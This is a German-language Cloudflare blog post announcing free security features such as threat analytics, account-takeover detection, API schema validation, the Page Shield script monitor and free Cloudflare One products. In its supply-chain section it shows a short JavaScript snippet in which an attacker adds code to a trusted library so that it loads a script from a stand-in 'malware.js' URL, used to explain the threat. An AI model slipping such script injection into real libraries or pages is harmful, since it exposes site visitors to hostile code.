Wer das Internet nutzt, kommt vermutlich täglich mit dem Cloudflare-Netzwerk in Berührung – sei es durch den Zugriff auf eine durch Cloudflare geschützte Website, die Nutzung unseres 1.1.1.1-Resolvers oder die Verbindung über ein Netzwerk mittels unserer Cloudflare One-Produkte.
Cloudflare obliegt damit die große Verantwortung, das Internet für Milliarden von Nutzern weltweit sicherer zu machen. Ab sofort stellen wir allen unseren Kunden Bedrohungsdaten und mehr als zehn neue Sicherheitsfunktionen kostenlos zur Verfügung. Egal, ob Sie Cloudflare verwenden, um Ihre Website, Ihr Heimnetzwerk oder Ihr Büro zu schützen: Wir haben auf jeden Fall etwas Hilfreiches für Sie, das Sie mit wenigen Klicks nutzen können.
Diese Funktionen konzentrieren sich auf einige der größten und sich verstärkenden Probleme im Bereich Cybersicherheit, darunter Angriffe zur Kontoübernahme, Supply Chain-Attacken, Angriffe auf API-Endpunkte, Netzwerküberblick und Netzwerk-Datenlecks.
Mehr Sicherheit für alle
Im folgenden Text erfahren Sie mehr über jede dieser Funktionen. Vorab möchten wir aber eine kurze Zusammenfassung liefern.
Wenn Sie sich für Cybersicherheit interessieren: Auf unserer neuen Cloudforce One-Website für Bedrohungsdaten können Sie sich über Angreifer, Angriffskampagnen und andere das Internet betreffende IT-Sicherheitsprobleme informieren.
Wenn Sie Betreiber einer Website sind: Ab heute umfassen alle unsere Free-Tarife den Zugang zu Sicherheitsanalysen für die zugehörigen Zonen. Darüber hinaus machen wir DNS-Analysedaten über GraphQL für jedermann verfügbar.
Sobald Sie sich einen Überblick verschafft haben, geht es darum, gut- von bösartigem Datenverkehr zu unterscheiden. Alle Kunden erhalten Zugang zu einer dauerhaft aktiven Erkennung von Angriffen zur Kontoübernahme, einer API-Schema-Validierung zur Durchsetzung eines positiven Sicherheitsmodells bei ihren API-Endpunkten und einem Page Shield-Script-Monitor. Dieser bietet Einblick in die Assets von Drittanbietern, die Sie von Ihrer Seite aus laden und die für Supply-Chain-Angriffe eingesetzt werden könnten.
Wenn Sie Cloudflare zum Schutz Ihrer Mitarbeitenden und Ihres Netzwerks verwenden: Wir werden eine Reihe unserer Cloudflare One-Produkte in einem neuen kostenlosen Angebotspaket bündeln. Dieses enthält die aktuellen, von uns kostenlos angebotenen Zero Trust-Produkte und neue Lösungen wie Magic Network Monitoring für Netzwerküberblick, Schutz vor Datenverlust (Data Loss Prevention – DLP) für sensible Informationen und Digital Experience Monitoring zur Messung von Netzwerkkonnektivität und -Performance. Cloudflare ist der einzige Anbieter, der kostenlose Versionen solcher Lösungen anbietet.
Wenn Sie ein neuer Nutzer sind: Wir bieten neue Optionen zur Authentifizierung. Ab heute besteht bei uns die Möglichkeit, Google zur Authentifizierung für die Registrierung und das Einloggen bei Cloudflare zu verwenden. Dadurch wird es für einige unserer Kunden einfacher, sich anzumelden und die Abhängigkeit von Passwörtern zu verringern, die man sich merken muss. Dadurch verringert sich wiederum die Wahrscheinlichkeit, dass ihr Cloudflare-Konto kompromittiert wird.
Jetzt schauen wir uns das Ganze genauer an:
Bedrohungs- und Analysedaten
Cloudforce One
Cloudforce One, unser Team für Bedrohungsforschung und Betrieb, freut sich, die Einführung einer frei zugänglichen Website speziell für Bedrohungsdaten bekannt geben zu können. Wir werden diese zur Veröffentlichung sowohl technischer Informationen als auch speziell für Führungskräfte relevanter Erkenntnisse bezüglich der neuesten Aktivitäten und Taktiken von Angreifern sowie von Einblicken in neue Schadsoftware, Sicherheitslücken und Angriffe nutzen.
Wir führen außerdem zwei neue Kennzahlen im Bereich Bedrohungsdaten ein und versprechen, dass weitere folgen werden. Schauen Sie einfach auf der neuen Website vorbei, um sich die aktuellen Untersuchungen anzusehen. Diese befassen sich mit einem hartnäckigen Angreifer auf staatlicher Linie, der Unternehmen in Süd- und Ostasien ins Visier nimmt, sowie mit der Zunahme des sogenannten „Double Brokering“ zwecks Frachtbetrug.
Melden Sie sich jetzt an, um künftig E-Mail-Benachrichtigungen zu neuen Bedrohungsuntersuchungen zu erhalten.
Sicherheitsanalysen
Sicherheitsanalysen bieten Ihnen einen Blick auf Ihren gesamten HTTP-Traffic – nicht nur auf abgewehrte Anfragen. So können Sie sich auf das Wesentliche konzentrieren: Datenverkehr, der als bösartig eingestuft, aber möglicherweise nicht abgewehrt wurde. Sie können dafür nicht nur „Security Events“ verwenden, um sich die von unseren Produkten für Anwendungssicherheit ergriffenen Sicherheitsmaßnahmen anzeigen zu lassen, sondern auch „Security Analytics“, um Ihren gesamten Datenverkehr auf Anomalien oder seltsames Verhalten zu überprüfen und dann anhand der gewonnenen Erkenntnisse präzise Abwehrregeln auf Grundlage Ihrer spezifischen Traffic-Muster zu erstellen. Ab sofort steht diese Möglichkeit allen unseren Kunden offen, welchen Tarif auch immer sie nutzen.
Nutzer mit Free- und Pro-Tarif haben jetzt Zugang zu einem neuen Dashboard für Sicherheitsanalysen. Dort können sie sich einen Überblick über ihren Datenverkehr im Traffic-Analyse-Diagramm verschaffen. Es besteht dort auch die Möglichkeit des Gruppierens und Filterns, um Anomalien mühelos zu erkennen. Sie können auch Top-Statistiken abrufen und nach einer Vielzahl von Merkmalen filtern – darunter Länder, Quellbrowser, Quellbetriebssysteme, HTTP-Versionen, SSL-Protokollversionen, Cache-Status und Sicherheitsmaßnahmen.
DNS-Analysen
Jeder Nutzer bei Cloudflare hat jetzt Zugang zu dem neuen und verbesserten DNS-Analyse-Dashboard sowie zu dem neuen DNS-Analysedatensatz über unsere leistungsstarke GraphQL-API. Sie können die DNS-Abfragen an Ihre Domain(s) jetzt ganz einfach analysieren, indem Sie leistungsstarke Filter anwenden und DNS-Abfragen nach Quelle aufschlüsseln. Das kann für die Fehlersuche, das Erkennen von Mustern und Trends oder die Erstellung von Nutzungsberichten hilfreich sein.
Mit der Veröffentlichung von Foundation DNS haben wir neue DNS-Analysen auf Basis von GraphQL eingeführt. Diese Analysen waren jedoch bisher nur für Zonen mit erweiterten Nameservern verfügbar. Da diese Analysedaten jedoch tiefgehende Einblicke ermöglichen, waren wir der Meinung, dass wir diese Funktion der Allgemeinheit zugänglich machen sollten. Ab sofort können die neuen DNS-Analysedaten auf GraphQL-Basis in jeder Zone über den autoritativen DNS-Dienst von Cloudflare unter „Analytics“ im Abschnitt „DNS“ abgerufen werden.
Erkennung und Abwehr von Anwendungsbedrohungen
Erkennung von Kontoübernahmen
65 % der Internetnutzer sind aufgrund der Wiederverwendung von Passwörtern und der zunehmenden Häufigkeit großer Datenlecks anfällig für Kontoübernahmen. Um ein besseres Internet zu schaffen, muss der Schutz wichtiger Konten für jedermann unkompliziert und leicht zugänglich sein.
Ab heute bieten wir jedem – von einzelnen Nutzern bis hin zu großen Unternehmen – kostenlos robusten Kontoschutz. Dieser hilft dabei, Credential Stuffing und andere auf Kontoübernahmen abzielende Angriffe zu durchkreuzen. Darüber hinaus stellen wir erweiterte Funktionen wie Prüfungen auf geleakte Anmeldedaten und Erkennung von Angriffen zur Kontoübernahme kostenlos zur Verfügung.
Diese Updates umfassen die automatische Erkennung von Anmeldungen, die Verhinderung von Brute-Force-Angriffen mit minimalem Setup und den Zugriff auf eine umfassende Datenbank mit geleakten Anmeldedaten und über 15 Milliarden Passwörtern, die neben unserer eigenen Datenbank auch geleakte Passwörter aus dem HIBP (Have I been Pwned)-Dienst enthalten wird. Kunden können gegen Anfragen mittels geleakter Anmeldedaten Maßnahmen ergreifen, und zwar entweder über Funktionen der Cloudflare-WAF wie Regeln zur Durchsatzbegrenzung und benutzerdefinierte Regeln oder beim Ursprungsserver durch die Durchsetzung einer Multi-Faktor-Authentifizierung (MFA) oder die verpflichtende Zurücksetzung von Passwörtern auf Grundlage eines an den Ursprungsserver gesendeten Headers.
Die Einrichtung ist einfach: Nutzer des Free-Tarifs kommen in den Genuss einer automatischen Erkennung, während zahlende Kunden die neuen Funktionen mit einem einzigen Klick im Cloudflare-Dashboard aktivieren können. Weitere Informationen zum Setup und zur Konfiguration finden Sie in unserer Dokumentation, die Sie jetzt nutzen können!
API-Schema-Validierung
API-Traffic macht mehr als die Hälfte des dynamischen Datenverkehrs im Cloudflare-Netzwerk aus. Durch die große Beliebtheit von API ist eine ganze Reihe neuer Angriffsvektoren entstanden. Die Schema-Validierung von Cloudflare API Shield stellt den ersten Schritt zur Stärkung Ihrer API-Sicherheit angesichts dieser neuen Bedrohungen dar.
Jetzt kann erstmals jeder Cloudflare-Kunde die Schema-Validierung einsetzen, um sicherzustellen, dass nur gültige Anfragen an seine API seinen Ursprungsserver erreichen.
Diese Funktion unterbindet die versehentliche Offenlegung von Informationen aufgrund von Fehlern. Sie verhindert außerdem, dass Entwickler Endpunkte durch einen nicht standardisierten Prozess willkürlich preisgeben, und blockiert automatisch Zombie-API, da Ihr API-Bestand im Rahmen einer kontinuierlichen Integration und Implementierung (Continuous Integration and Continuous Deployment – CI/CD) auf dem neuesten Stand gehalten wird.
Wir empfehlen Ihnen, die API oder den Terraform-Provider von Cloudflare zu verwenden, um Endpunkte zu Cloudflare API Shield hinzuzufügen und das Schema nach der Freigabe Ihres Quellcodes im Rahmen Ihres Post-Build-CI/CD-Prozesses zu aktualisieren. Auf diese Weise wird API Shield zu einem bevorzugten API-Inventarisierungstool und die Schema-Validierung übernimmt unerwartete Anfragen an Ihre API.
Während sich bei API alles um die Integration mit Drittanbietern dreht, werden manchmal Integrationen durch das Laden von Bibliotheken direkt in Ihre Anwendung durchgeführt. Als Nächstes werden wir dazu beitragen, das Web noch sicherer zu machen, indem wir Nutzer vor schädlichen Dritt-Skripten schützen, die sensible Informationen aus Eingaben auf Ihren Seiten entwenden.
Vorbeugung von Suppy-Chain-Angriffen
Moderne Webanwendungen verbessern die Nutzererfahrung und verkürzen die Entwicklungszeit durch die Verwendung von JavaScript-Bibliotheken von Drittanbietern. Aufgrund ihrer privilegierten Zugriffsebene für alles auf der Seite kann eine kompromittierte JavaScript-Bibliothek eines Drittanbieters heimlich – vom Endnutzer oder Website-Administrator unbemerkt – sensible Daten an einen Angreifer übermitteln.
Um dieser Bedrohung entgegenzuwirken, haben wir vor drei Jahren Page Shield eingeführt. Ab sofort stellen wir allen unseren Nutzern den Script Monitor von Page Shield kostenlos zur Verfügung.
Mit Script Monitor sehen Sie alle auf der Seite geladenen JavaScript-Assets, nicht nur die von Ihren Entwicklern einbezogenen. Diese Übersicht umfasst auch Skripte, die dynamisch von anderen Skripten geladen werden. Sobald ein Angreifer die Bibliothek kompromittiert hat, ist es für ihn ein Kinderspiel, ein neues schädliches Skript hinzuzufügen, ohne den Kontext des ursprünglichen HTML-Quellcodes zu verändern. Es genügt, neuen Quellcode in das bestehende enthaltene JavaScript-Asset einzufügen:
// Original library code (trusted)
function someLibraryFunction() {
// useful functionality here
}
// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);
Script Monitor war unverzichtbar, als bekannt wurde, dass die Bibliothek http://pollyfill.io den Besitzer gewechselt hat. Die Nutzer von Script Monitor konnten sofort sehen, welche Skripte auf ihren Websites geladen wurden. So war für sie schnell und leicht erkennbar, ob eine Gefährdung bestand.
Wir freuen uns, dass wir den Überblick über diese Skripte nun auf so viel wie möglich im Web ausdehnen können, indem wir Script Monitor für alle Kunden freigeben. Wie Sie loslegen können, erfahren Sie hier in der Dokumentation.
Bestehende Nutzer von Page Shield können sofort die überwachten Daten filtern, denn sie wissen, ob polyfill.io (oder eine andere Bibliothek) von ihrer Anwendung verwendet wird. Außerdem haben wir als Reaktion auf den kompromittierten Dienst eine Neufassung von polyfill.io erstellt, die im Juni 2024 automatisch für Free-Tarife aktiviert wurde.
Turnstile als Google Firebase-Erweiterung hinzugefügt
Wir freuen uns, den Cloudflare Turnstile App Check-Provider für Google Firebase vorstellen zu können. Dieser bietet eine reibungslose Integration ohne manuelle Einrichtung. Mit dieser neuen Erweiterung können Entwickler, die Mobilgeräte- oder Webanwendungen auf Firebase erstellen, ihre Projekte mithilfe der CAPTCHA-Alternative von Cloudflare vor Bots schützen. Mit den Bot-Erkennungs- und Challenge-Funktionen von Turnstile können Sie sicherstellen, dass nur authentische menschliche Besucher mit Ihren Firebase-Backend-Diensten interagieren. So verbessern Sie sowohl die Sicherheit als auch die Nutzererfahrung. Die datenschutzfreundliche CAPTCHA-Alternative Cloudflare Turnstile unterscheidet zwischen Menschen und Bots, ohne die Nutzererfahrung zu beeinträchtigen. Turnstile arbeitet im Gegensatz zu herkömmlichen CAPTCHA-Lösungen, die Nutzer oft abschrecken, unsichtbar und bietet verschiedene Modi, um reibungslose Nutzerinteraktionen zu gewährleisten.
Die Firebase App Check-Erweiterung für Turnstile lässt sich einfach integrieren und ermöglicht es Entwicklern, die Sicherheit von Anwendungen mit minimalem Einrichtungsaufwand schnell zu verbessern. Sie ist mit unbegrenzter Nutzung in Verbindung mit der kostenlosen Tarifoption von Turnstile ebenfalls gratis. Durch die Kombination der Stärken der Backend-Dienste von Google Firebase und Turnstile von Cloudflare können Entwickler eine sichere und reibungslose Nutzererfahrung ermöglichen.
Cloudflare One
Cloudflare One ist eine umfassende Secure Access Service Edge (SASE)-Plattform. Sie wurde entwickelt, um Menschen, Anwendungen, Geräte und Netzwerke im gesamten Internet zu schützen und zu vernetzen. Sie vereint unter anderem Dienste wie Zero Trust Network Access (ZTNA) und Secure Web Gateway (SWG). Cloudflare One kann jedem helfen, Menschen und Netzwerke abzusichern, Zugriffskontrolle zu verwalten, sich vor Cyberbedrohungen abzuschirmen, seine Daten zu schützen und die Performance des Netzwerk-Traffics zu verbessern, indem dieser über das globale Netzwerk von Cloudflare geleitet wird. Die Lösung ersetzt herkömmliche IT-Sicherheitsmaßnahmen durch einen cloudbasierten Ansatz zum Schutz und zur Optimierung des Zugriffs auf Firmenressourcen.
Jeder kann ab sofort kostenlos vier neue Produkte nutzen, um die Cloudflare One in den letzten zwei Jahren erweitert wurde:
Cloud Access Security Broker (CASB) zur Bekämpfung von Gefahren für SaaS-Anwendungen.
Schutz vor Datenverlust (Data Loss Prevention – DLP), damit sensible Daten nicht aus Ihrem Netzwerk oder Ihren SaaS-Anwendungen abfließen.
Digital Experience Monitoring, um zu sehen, welche Erfahrungen ein Nutzer in einem beliebigen Netzwerk macht.
Magic Network Monitoring, um den gesamten Traffic zu sehen, der Ihr Netzwerk durchläuft.
Dabei handelt es sich um eine Ergänzung der bereits in der Cloudflare One-Plattform enthaltenen Produkte für Netzwerksicherheit:
Access zur Überprüfung der Identität der Nutzer, damit diese nur die für sie vorgesehenen Applikationen verwenden können.
Gateway zum Schutz des Netzwerktraffics, der sowohl für das öffentliche Internet als auch für Ihr privates Netzwerk bestimmt ist.
Cloudflare Tunnel, unser App-Konnektor, der sowohl cloudflared als auch WARP Connector umfasst, zur Verbindung verschiedener Anwendungen, Server und privater Netzwerke mit dem Cloudflare-Netzwerk.
Cloudflare WARP, unser Geräte-Agent, zur sicheren Traffic-Übermittlung von einem Laptop oder Mobilgerät ins Internet.
Wer über ein Cloudflare-Konto verfügt, erhält automatisch 50 kostenlose Lizenzen für alle diese Produkte in seinem bei Cloudflare One angemeldeten Unternehmen. Auf unserer Seite für Zero Trust- und SASE-Tarife erfahren Sie mehr zu unseren kostenlosen Produkten sowie zu unseren Prepaid- und Vertrags-Tarifen für Teams mit mehr als 50 Mitgliedern.
Authentifizierung mit Google
Das Cloudflare-Dashboard selbst ist zu einer wichtigen Ressource geworden, die geschützt werden muss. Wir verwenden deshalb viel Zeit darauf, sicherzustellen, dass die Konten von Cloudflare-Nutzern nicht kompromittiert werden.
Zu diesem Zweck haben wir die Sicherheit durch zusätzliche Authentifizierungsmethoden erhöht, darunter eine anwendungsbasierte Zwei-Faktor-Authentifizierung (2FA), Passkeys, SSO und Anmeldung über Apple. Ab sofort bieten wir die Möglichkeit, sich mit einem Google-Konto zu registrieren und einzuloggen.
Cloudflare unterstützt verschiedene Workflows zur Authentifizierung, die auf unterschiedliche Anwendungsfälle zugeschnitten sind. SSO und Passkeys sind die bevorzugten und sichersten Authentifizierungsmethoden. Wir sind jedoch davon überzeugt, dass die Bereitstellung von Authentifizierungsfaktoren, die stärker als Passwörter sind, eine Lücke schließen und die durchschnittliche Sicherheit für unsere Nutzer erhöhen wird. Die Anmeldung mit Google macht unseren Nutzern das Leben leichter und erspart es ihnen, sich ein weiteres Passwort merken zu müssen, wenn sie bereits mit einer Google-Identität im Web surfen.
Das Login über Google beruht auf der OAuth 2.0-Spezifikation und ermöglicht es Google, identifizierende Informationen über eine bestimmte Identität auf sichere Weise zu übermitteln. Gleichzeitig wird sichergestellt, dass tatsächlich Google diese Informationen übermittelt. So wird verhindert, dass Angreifer sich als Google ausgeben.
Das bedeutet, dass wir die Authentifizierung an Google delegieren können und so Zero-Knowledge-Angriffe direkt auf diese Cloudflare-Identität verhindern.
Wenn Sie zur Login-Seite von Cloudflare geleitet werden, wird Ihnen die folgende Schaltfläche angezeigt. Wenn Sie darauf klicken, können Sie sich für Cloudflare registrieren. Sobald dies geschehen ist, können Sie sich ohne Passworteingabe einloggen und alle vorhandenen Schutzmechanismen nutzen, die Sie bei Ihrem Google-Konto eingestellt haben.
Mit Einführung dieser Funktion verwenden wir nun unsere eigenen Worker, um eine Abstraktionsebene für OIDC-kompatible Identitätsanbieter (wie GitHub- und Microsoft-Konten) bereitzustellen. Somit können unsere Nutzer in der Zukunft eine stärkere Unterstützung von Verbindungen mit Identitätsanbietern (Identity Provider – IdP) erwarten.
Zurzeit können sich nur neue Kunden, die sich bei Google registrieren, mit ihrem Google-Konto einloggen. Wir werden diese Möglichkeit aber künftig noch für weitere unserer Nutzer implementieren. So soll die Option eingeführt werden, Social Login-Anbieter zu verknüpfen/entkoppeln. Außerdem werden wir weitere Social Login-Methoden einführen. Enterprise-Nutzer mit einem etablierten SSO-Setup können diese Methode zurzeit nicht verwenden. Diejenigen mit einem etablierten SSO-Setup auf Grundlage von Google Workspace werden an ihren SSO-Flow weitergeleitet, da wir überlegen, wie wir die Access- und IdP-Richtlinien optimieren können, die eingerichtet wurden, um Ihre Cloudflare-Umgebung abzusichern.
Wenn Sie neu bei Cloudflare sind und über ein Google-Konto verfügen, ist die Nutzung von Cloudflare zum Schutz Ihrer Website, zur Erstellung eines neuen Diensts oder zum Ausprobieren eines anderen von Cloudflare angebotenen Services jetzt einfacher denn je.
Für mehr Sicherheit im Internet
Eines der Ziele von Cloudflare war schon immer, Tools für Cybersicherheit zu demokratisieren, damit jeder auch ohne die Ressourcen großer Unternehmen Inhalte bereitstellen und auf sichere Weise eine Verbindung zum Internet herstellen kann.
Wir haben beschlossen, allen Cloudflare-Nutzern eine große Reihe neuer Funktionen kostenlos zur Verfügung zu stellen, die eine breite Palette von Sicherheitsanwendungsfällen abdecken: für Web-Administratoren, Netzwerk-Administratoren und Cybersicherheits-Enthusiasten.
Loggen Sie sich einfach bei Ihrem Cloudflare-Konto ein, um diese neuen Angebote ab sofort zu nutzen. Wir freuen uns über Feedback in unseren Community-Foren und wollen in Zukunft sowohl bestehende als auch neue Funktionen weiter verbessern.